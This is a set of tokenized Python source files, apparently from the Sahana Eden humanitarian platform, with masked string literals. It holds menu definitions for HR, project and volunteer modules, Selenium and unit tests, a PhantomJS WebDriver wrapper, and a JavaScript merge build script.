"<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT:index>" ) , <EOL> ) <EOL> return menu <EOL> def gis ( self ) : <EOL> """<STR_LIT>""" <EOL> if current . request . function == "<STR_LIT:index>" : <EOL> return None <EOL> else : <EOL> return super ( S3OptionsMenu , self ) . gis ( ) <EOL> @ staticmethod <EOL> def hrm ( ) : <EOL> """<STR_LIT>""" <EOL> has_role = current . auth . s3_has_role <EOL> s3 = current . session . s3 <EOL> ADMIN = s3 . system_roles . ADMIN <EOL> settings = current . deployment_settings <EOL> if "<STR_LIT>" not in s3 : <EOL> current . s3db . hrm_vars ( ) <EOL> hrm_vars = s3 . hrm <EOL> SECTORS = "<STR_LIT>" if settings . get_ui_label_cluster ( ) else "<STR_LIT>" <EOL> manager_mode = lambda i : hrm_vars . 
mode is None <EOL> personal_mode = lambda i : hrm_vars . mode is not None <EOL> is_org_admin = lambda i : hrm_vars . orgs and True or has_role ( ADMIN ) <EOL> is_super_editor = lambda i : has_role ( "<STR_LIT>" ) or has_role ( "<STR_LIT>" ) <EOL> staff = { "<STR_LIT>" : "<STR_LIT>" } <EOL> use_certs = lambda i : settings . get_hrm_use_certificates ( ) <EOL> return M ( ) ( <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , f = ( "<STR_LIT>" , "<STR_LIT>" ) , m = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" , <EOL> vars = staff , p = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , <EOL> c = "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" , <EOL> check = [ manager_mode , is_super_editor ] ) , <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , <EOL> f = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" , <EOL> ) , <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" , p = "<STR_LIT>" , check = is_org_admin ) <EOL> ) , <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" , p = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" , p = "<STR_LIT>" , check = is_org_admin ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" 
) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , <EOL> vars = dict ( expiring = "<STR_LIT:1>" ) ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" , p = "<STR_LIT>" , check = is_org_admin ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = [ manager_mode , use_certs ] ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" , p = "<STR_LIT>" , check = is_org_admin ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , <EOL> restrict = [ ADMIN ] , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" , <EOL> restrict = [ ADMIN ] , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT:index>" , <EOL> check = [ personal_mode , is_org_admin ] ) , <EOL> ) <EOL> def org ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . 
hrm ( ) <EOL> @ staticmethod <EOL> def project ( ) : <EOL> """<STR_LIT>""" <EOL> return M ( c = "<STR_LIT>" ) ( <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , vars = { "<STR_LIT>" : <NUM_LIT:1> } ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT:time>" ) ( <EOL> M ( "<STR_LIT>" , vars = { "<STR_LIT>" : <NUM_LIT:1> } ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , vars = { "<STR_LIT>" : <NUM_LIT:1> } ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" ) ( <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT:time>" , m = "<STR_LIT>" , <EOL> vars = Storage ( rows = "<STR_LIT>" , <EOL> cols = "<STR_LIT>" , <EOL> fact = "<STR_LIT>" , <EOL> week = <NUM_LIT:1> ) ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT:time>" , m = "<STR_LIT>" , <EOL> vars = Storage ( rows = "<STR_LIT>" , <EOL> cols = "<STR_LIT>" , <EOL> fact = "<STR_LIT>" , <EOL> month = <NUM_LIT:1> ) ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT:time>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> ) <EOL> @ staticmethod <EOL> def req ( ) : <EOL> """<STR_LIT>""" <EOL> return M ( c = "<STR_LIT>" ) ( <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" , vars = { "<STR_LIT:type>" : <NUM_LIT:3> } ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , <EOL> ) , <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , <EOL> ) ( ) , <EOL> M ( "<STR_LIT>" , c = "<STR_LIT>" , f = "<STR_LIT>" ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" , t = "<STR_LIT>" ) , <EOL> ) , <EOL> ) <EOL> @ staticmethod <EOL> def vol ( ) : <EOL> """<STR_LIT>""" <EOL> auth = current . auth <EOL> has_role = auth . s3_has_role <EOL> s3 = current . session . s3 <EOL> ADMIN = s3 . system_roles . 
ADMIN <EOL> root_org = auth . root_org_name ( ) <EOL> manager_mode = lambda i : s3 . hrm . mode is None <EOL> personal_mode = lambda i : s3 . hrm . mode is not None <EOL> is_org_admin = lambda i : s3 . hrm . orgs and True or has_role ( ADMIN ) <EOL> is_super_editor = lambda i : has_role ( "<STR_LIT>" ) or has_role ( "<STR_LIT>" ) <EOL> settings = current . deployment_settings <EOL> use_certs = lambda i : settings . get_hrm_use_certificates ( ) <EOL> show_programmes = lambda i : settings . get_hrm_vol_experience ( ) == "<STR_LIT>" <EOL> show_tasks = lambda i : settings . has_module ( "<STR_LIT>" ) and settings . get_project_mode_task ( ) <EOL> teams = settings . get_hrm_teams ( ) <EOL> use_teams = lambda i : teams <EOL> return M ( c = "<STR_LIT>" ) ( <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" , <EOL> check = [ manager_mode ] ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" , <EOL> vars = { "<STR_LIT>" : "<STR_LIT>" } , p = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , <EOL> c = "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" , <EOL> check = [ manager_mode , is_super_editor ] ) , <EOL> M ( teams , f = "<STR_LIT>" , <EOL> check = [ manager_mode , use_teams ] ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = [ manager_mode ] ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" , p = "<STR_LIT>" , check = is_org_admin ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( 
"<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = [ manager_mode , use_certs ] ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = [ manager_mode , show_programmes ] ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = [ manager_mode , is_org_admin ] ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" , <EOL> check = manager_mode ) ( <EOL> M ( "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" , <EOL> vars = Storage ( rows = "<STR_LIT>" , <EOL> cols = "<STR_LIT>" , <EOL> fact = "<STR_LIT>" ) , <EOL> check = show_programmes ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" , <EOL> vars = Storage ( rows = "<STR_LIT>" , <EOL> cols = "<STR_LIT>" , <EOL> fact = "<STR_LIT>" ) , <EOL> check = show_programmes ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , m = "<STR_LIT>" ) , <EOL> ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT>" , <EOL> check = [ personal_mode , show_tasks ] , <EOL> vars = dict ( access = "<STR_LIT>" , <EOL> mine = <NUM_LIT:1> ) ) , <EOL> M ( "<STR_LIT>" , f = "<STR_LIT:index>" , <EOL> check = [ personal_mode , is_org_admin ] ) , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import time <EOL> from tests . web2unittest import SeleniumUnitTest <EOL> class CreateAsset ( SeleniumUnitTest ) : <EOL> def test_asset001_create_asset ( self ) : <EOL> """<STR_LIT>""" <EOL> today = self . today ( ) <EOL> now = self . now ( ) <EOL> now_1_day = self . now_1_day ( ) <EOL> now_1_week = self . now_1_week ( ) <EOL> self . login ( account = "<STR_LIT>" , nexturl = "<STR_LIT>" ) <EOL> self . create ( "<STR_LIT>" , <EOL> [ ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> today ) , <EOL> ( "<STR_LIT>" , <EOL> <NUM_LIT:8> ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) ] <EOL> ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> self . browser . find_element_by_link_text ( "<STR_LIT>" ) . click ( ) <EOL> self . create ( "<STR_LIT>" , <EOL> [ <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) ] <EOL> ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> self . browser . find_element_by_link_text ( "<STR_LIT>" ) . click ( ) <EOL> self . create ( "<STR_LIT>" , <EOL> [ <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) ] <EOL> ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> self . browser . find_element_by_link_text ( "<STR_LIT>" ) . click ( ) <EOL> self . create ( "<STR_LIT>" , <EOL> [ ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , <EOL> "<STR_LIT>" ) ] <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from gluon import current <EOL> from tests . web2unittest import SeleniumUnitTest <EOL> class CreateOrganisation ( SeleniumUnitTest ) : <EOL> def test_org001_create_organisation ( self , items = [ <NUM_LIT:0> ] ) : <EOL> """<STR_LIT>""" <EOL> settings = current . deployment_settings <EOL> tablename = "<STR_LIT>" <EOL> url = "<STR_LIT>" <EOL> account = "<STR_LIT>" <EOL> data = [ <EOL> [ <EOL> ( "<STR_LIT:name>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ] , <EOL> ] <EOL> if settings . get_org_regions ( ) : <EOL> data [ <NUM_LIT:0> ] . append ( ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> db = current . db <EOL> s3db = current . s3db <EOL> table = s3db [ tablename ] <EOL> for item in items : <EOL> _data = data [ item ] <EOL> fieldname = _data [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> value = _data [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] <EOL> query = ( table [ fieldname ] == value ) & ( table . deleted == "<STR_LIT:F>" ) <EOL> record = db ( query ) . select ( table . id , <EOL> limitby = ( <NUM_LIT:0> , <NUM_LIT:1> ) ) . first ( ) <EOL> if record : <EOL> debug = "<STR_LIT>" % value <EOL> print debug <EOL> self . s3_debug ( debug ) <EOL> return False <EOL> self . login ( account = account , nexturl = url ) <EOL> result = self . create ( tablename , _data ) </s>
<s> """<STR_LIT>""" <EOL> from tests . web2unittest import SeleniumUnitTest <EOL> class ExportStaff ( SeleniumUnitTest ) : <EOL> def test_export_staff ( self ) : <EOL> print "<STR_LIT:\n>" <EOL> self . login ( account = "<STR_LIT>" , nexturl = "<STR_LIT>" ) <EOL> browser = self . browser <EOL> browser . find_element_by_xpath ( "<STR_LIT>" ) . click ( ) </s>
<s> import unittest <EOL> from gluon import * <EOL> from s3 . s3filter import * <EOL> class S3FilterWidgetTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def testInit ( self ) : <EOL> """<STR_LIT>""" <EOL> widget = S3FilterWidget ( [ "<STR_LIT:name>" , "<STR_LIT>" ] , <EOL> option = "<STR_LIT>" , <EOL> _class = "<STR_LIT>" ) <EOL> self . assertTrue ( "<STR_LIT>" in widget . opts ) <EOL> self . assertTrue ( len ( widget . opts ) , <NUM_LIT:1> ) <EOL> self . assertTrue ( widget . opts [ "<STR_LIT>" ] == "<STR_LIT>" ) <EOL> self . assertTrue ( "<STR_LIT>" in widget . attr ) <EOL> self . assertTrue ( len ( widget . attr ) , <NUM_LIT:1> ) <EOL> self . assertTrue ( widget . attr [ "<STR_LIT>" ] == "<STR_LIT>" ) <EOL> def testRender ( self ) : <EOL> """<STR_LIT>""" <EOL> widget = S3FilterWidget ( [ "<STR_LIT:name>" , "<STR_LIT>" ] ) <EOL> widget . widget = lambda resource , values : "<STR_LIT>" <EOL> resource = current . s3db . resource ( "<STR_LIT>" ) <EOL> output = widget ( resource , get_vars = { } ) <EOL> self . assertTrue ( isinstance ( output [ <NUM_LIT:0> ] , INPUT ) ) <EOL> attr = output [ <NUM_LIT:0> ] . attributes <EOL> t = attr [ "<STR_LIT>" ] <EOL> self . assertEqual ( t , "<STR_LIT>" ) <EOL> c = attr [ "<STR_LIT>" ] <EOL> self . assertTrue ( "<STR_LIT>" in c ) <EOL> self . assertTrue ( "<STR_LIT>" % widget . _class in c ) <EOL> i = attr [ "<STR_LIT>" ] <EOL> self . assertEqual ( i , "<STR_LIT>" % <EOL> ( resource . alias , widget . _class ) ) <EOL> v = attr [ "<STR_LIT>" ] <EOL> self . assertEqual ( v , "<STR_LIT>" ) <EOL> def testSelector ( self ) : <EOL> """<STR_LIT>""" <EOL> fields = "<STR_LIT:name>" <EOL> s3db = current . s3db <EOL> widget = S3FilterWidget ( ) <EOL> resource = s3db . resource ( "<STR_LIT>" ) <EOL> label , selector = widget . _selector ( resource , fields ) <EOL> self . assertEqual ( selector , "<STR_LIT>" ) <EOL> widget . alias = "<STR_LIT>" <EOL> label , selector = widget . _selector ( resource , fields ) <EOL> self . 
assertEqual ( selector , "<STR_LIT>" ) <EOL> widget . alias = None <EOL> fields = "<STR_LIT>" <EOL> resource = s3db . resource ( "<STR_LIT>" ) <EOL> label , selector = widget . _selector ( resource , fields ) <EOL> self . assertEqual ( selector , None ) <EOL> fields = [ "<STR_LIT:name>" , "<STR_LIT>" ] <EOL> resource = s3db . resource ( "<STR_LIT>" ) <EOL> label , selector = widget . _selector ( resource , fields ) <EOL> self . assertEqual ( selector , "<STR_LIT>" ) <EOL> fields = [ ] <EOL> resource = s3db . resource ( "<STR_LIT>" ) <EOL> label , selector = widget . _selector ( resource , fields ) <EOL> self . assertEqual ( selector , None ) <EOL> def testVariable ( self ) : <EOL> """<STR_LIT>""" <EOL> variable = S3FilterWidget . _variable ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . assertEqual ( variable , "<STR_LIT>" ) <EOL> variable = S3FilterWidget . _variable ( "<STR_LIT>" , None ) <EOL> self . assertEqual ( variable , "<STR_LIT>" ) <EOL> variable = S3FilterWidget . _variable ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . assertEqual ( variable , "<STR_LIT>" ) <EOL> variable = S3FilterWidget . _variable ( "<STR_LIT>" , ( "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> self . assertEqual ( variable , [ "<STR_LIT>" , <EOL> "<STR_LIT>" ] ) <EOL> def testValues ( self ) : <EOL> """<STR_LIT>""" <EOL> get_vars = { "<STR_LIT>" : "<STR_LIT:1>" , <EOL> "<STR_LIT>" : [ "<STR_LIT>" , "<STR_LIT:3>" ] } <EOL> values = S3FilterWidget . _values ( get_vars , "<STR_LIT>" ) <EOL> self . assertEqual ( len ( values ) , <NUM_LIT:1> ) <EOL> self . assertTrue ( "<STR_LIT:1>" in values ) <EOL> values = S3FilterWidget . _values ( get_vars , "<STR_LIT>" ) <EOL> self . assertEqual ( len ( values ) , <NUM_LIT:3> ) <EOL> self . assertTrue ( "<STR_LIT:1>" in values ) <EOL> self . assertTrue ( "<STR_LIT:2>" in values ) <EOL> self . assertTrue ( "<STR_LIT:3>" in values ) <EOL> def run_suite ( * test_classes ) : <EOL> """<STR_LIT>""" <EOL> loader = unittest . TestLoader ( ) <EOL> suite = unittest . 
TestSuite ( ) <EOL> for test_class in test_classes : <EOL> tests = loader . loadTestsFromTestCase ( test_class ) <EOL> suite . addTests ( tests ) <EOL> if suite is not None : <EOL> unittest . TextTestRunner ( verbosity = <NUM_LIT:2> ) . run ( suite ) <EOL> return <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> run_suite ( <EOL> S3FilterWidgetTests , <EOL> ) </s>
<s> import base64 <EOL> from selenium . webdriver . remote . command import Command <EOL> from selenium . webdriver . remote . remote_connection import RemoteConnection <EOL> from selenium . webdriver . remote . webdriver import WebDriver as RemoteWebDriver <EOL> from selenium . webdriver . common . desired_capabilities import DesiredCapabilities <EOL> from selenium . common . exceptions import WebDriverException <EOL> from selenium . webdriver . phantomjs . service import Service <EOL> class WebDriver ( RemoteWebDriver ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , executable_path = "<STR_LIT>" , <EOL> port = <NUM_LIT:0> , desired_capabilities = DesiredCapabilities . PHANTOMJS , <EOL> service_args = None , service_log_path = None ) : <EOL> """<STR_LIT>""" <EOL> self . service = Service ( executable_path , port = port , <EOL> service_args = service_args , log_path = service_log_path ) <EOL> self . service . start ( ) <EOL> command_executor = self . service . service_url <EOL> try : <EOL> RemoteWebDriver . __init__ ( self , <EOL> command_executor = command_executor , <EOL> desired_capabilities = desired_capabilities ) <EOL> except : <EOL> self . quit ( ) <EOL> raise <EOL> self . _is_remote = False <EOL> self . command_executor = RemoteConnection ( command_executor , keep_alive = False ) <EOL> Command . EXECUTE_PHANTOM_SCRIPT = "<STR_LIT>" <EOL> self . command_executor . _commands [ Command . EXECUTE_PHANTOM_SCRIPT ] = ( "<STR_LIT:POST>" , "<STR_LIT>" ) <EOL> def quit ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> RemoteWebDriver . quit ( self ) <EOL> except : <EOL> pass <EOL> finally : <EOL> self . service . stop ( ) <EOL> def execute_phantomjs ( self , script , * args ) : <EOL> """<STR_LIT>""" <EOL> converted_args = list ( args ) <EOL> return self . execute ( Command . EXECUTE_PHANTOM_SCRIPT , <EOL> { '<STR_LIT>' : script , '<STR_LIT:args>' : converted_args } ) [ '<STR_LIT:value>' ] </s>
<s> import re <EOL> import os <EOL> import sys <EOL> SUFFIX_JAVASCRIPT = "<STR_LIT>" <EOL> RE_REQUIRE = "<STR_LIT>" <EOL> class SourceFile : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , filepath , source ) : <EOL> """<STR_LIT:U+0020>""" <EOL> self . filepath = filepath <EOL> self . source = source <EOL> self . requiredBy = [ ] <EOL> def _getRequirements ( self ) : <EOL> """<STR_LIT>""" <EOL> return re . findall ( RE_REQUIRE , self . source ) <EOL> requires = property ( fget = _getRequirements , doc = "<STR_LIT>" ) <EOL> def usage ( filename ) : <EOL> """<STR_LIT>""" <EOL> print "<STR_LIT>" % filename <EOL> class Config : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , filename ) : <EOL> """<STR_LIT>""" <EOL> lines = [ line . strip ( ) <EOL> for line in open ( filename ) <EOL> if line . strip ( ) ] <EOL> self . forceFirst = lines [ lines . index ( "<STR_LIT>" ) + <NUM_LIT:1> : lines . index ( "<STR_LIT>" ) ] <EOL> self . forceLast = lines [ lines . index ( "<STR_LIT>" ) + <NUM_LIT:1> : lines . index ( "<STR_LIT>" ) ] <EOL> self . include = lines [ lines . index ( "<STR_LIT>" ) + <NUM_LIT:1> : lines . index ( "<STR_LIT>" ) ] <EOL> self . exclude = lines [ lines . index ( "<STR_LIT>" ) + <NUM_LIT:1> : ] <EOL> def getFiles ( configDict , configFile = None ) : <EOL> cfg = None <EOL> if configFile : <EOL> cfg = Config ( configFile ) <EOL> allDirs = [ ] <EOL> for k , v in configDict . iteritems ( ) : <EOL> if not v in allDirs : <EOL> allDirs . append ( v ) <EOL> allFiles = [ ] <EOL> for sourceDirectory in allDirs : <EOL> for root , dirs , files in os . walk ( sourceDirectory ) : <EOL> for filename in files : <EOL> if filename . endswith ( SUFFIX_JAVASCRIPT ) and not filename . startswith ( "<STR_LIT:.>" ) : <EOL> filepath = os . path . join ( root , filename ) [ len ( sourceDirectory ) + <NUM_LIT:1> : ] <EOL> filepath = filepath . replace ( "<STR_LIT:\\>" , "<STR_LIT:/>" ) <EOL> if cfg and cfg . include : <EOL> if filepath in cfg . include or filepath in cfg . 
forceFirst : <EOL> allFiles . append ( filepath ) <EOL> elif ( not cfg ) or ( filepath not in cfg . exclude ) : <EOL> allFiles . append ( filepath ) <EOL> files = { } <EOL> order = [ ] <EOL> for filepath in allFiles : <EOL> if "<STR_LIT:\\>" in filepath : <EOL> filekey = filepath . replace ( "<STR_LIT:\\>" , "<STR_LIT:/>" ) . split ( "<STR_LIT:/>" ) [ <NUM_LIT:0> ] <EOL> elif "<STR_LIT:/>" in filepath : <EOL> filekey = filepath . split ( "<STR_LIT:/>" ) [ <NUM_LIT:0> ] <EOL> else : <EOL> filekey = "<STR_LIT:.>" <EOL> fullpath = os . path . join ( configDict [ filekey ] , filepath ) <EOL> content = open ( fullpath , "<STR_LIT>" ) . read ( ) <EOL> files [ filepath ] = SourceFile ( filepath , content ) <EOL> from toposortmf import toposort <EOL> complete = False <EOL> resolution_pass = <NUM_LIT:1> <EOL> while not complete : <EOL> order = [ ] <EOL> nodes = [ ] <EOL> routes = [ ] <EOL> resolution_pass += <NUM_LIT:1> <EOL> for filepath , info in files . items ( ) : <EOL> nodes . append ( filepath ) <EOL> for neededFilePath in info . requires : <EOL> routes . append ( ( neededFilePath , filepath ) ) <EOL> for dependencyLevel in toposort ( nodes , routes ) : <EOL> for filepath in dependencyLevel : <EOL> order . append ( filepath ) <EOL> if not files . has_key ( filepath ) : <EOL> if "<STR_LIT:\\>" in filepath : <EOL> filekey = filepath . replace ( "<STR_LIT:\\>" , "<STR_LIT:/>" ) . split ( "<STR_LIT:/>" ) [ <NUM_LIT:0> ] <EOL> elif "<STR_LIT:/>" in filepath : <EOL> filekey = filepath . split ( "<STR_LIT:/>" ) [ <NUM_LIT:0> ] <EOL> else : <EOL> filekey = "<STR_LIT:.>" <EOL> fullpath = os . path . join ( configDict [ filekey ] , filepath ) <EOL> content = open ( fullpath , "<STR_LIT>" ) . read ( ) <EOL> files [ filepath ] = SourceFile ( filepath , content ) <EOL> complete = True <EOL> try : <EOL> for fp in order : <EOL> if max ( [ order . index ( rfp ) for rfp in files [ fp ] . requires ] + <EOL> [ order . index ( fp ) ] ) != order . 
index ( fp ) : <EOL> complete = False <EOL> except : <EOL> complete = False <EOL> if cfg : <EOL> order = cfg . forceFirst + [ item <EOL> for item in order <EOL> if ( ( item not in cfg . forceFirst ) and <EOL> ( item not in cfg . forceLast ) ) ] + cfg . forceLast <EOL> return ( files , order ) <EOL> def run ( files , order , outputFilename = None ) : <EOL> result = [ ] <EOL> HEADER = "<STR_LIT>" + "<STR_LIT:=>" * <NUM_LIT> + "<STR_LIT>" + "<STR_LIT:U+0020>" + "<STR_LIT:=>" * <NUM_LIT> + "<STR_LIT>" <EOL> for fp in order : <EOL> f = files [ fp ] <EOL> result . append ( HEADER % f . filepath ) <EOL> source = f . source <EOL> result . append ( source ) <EOL> if not source . endswith ( "<STR_LIT:\n>" ) : <EOL> result . append ( "<STR_LIT:\n>" ) <EOL> if outputFilename : <EOL> open ( outputFilename , "<STR_LIT:w>" ) . write ( "<STR_LIT>" . join ( result ) ) <EOL> return "<STR_LIT>" . join ( result ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> import getopt <EOL> options , args = getopt . getopt ( sys . argv [ <NUM_LIT:1> : ] , "<STR_LIT>" ) <EOL> try : <EOL> outputFilename = args [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> usage ( sys . argv [ 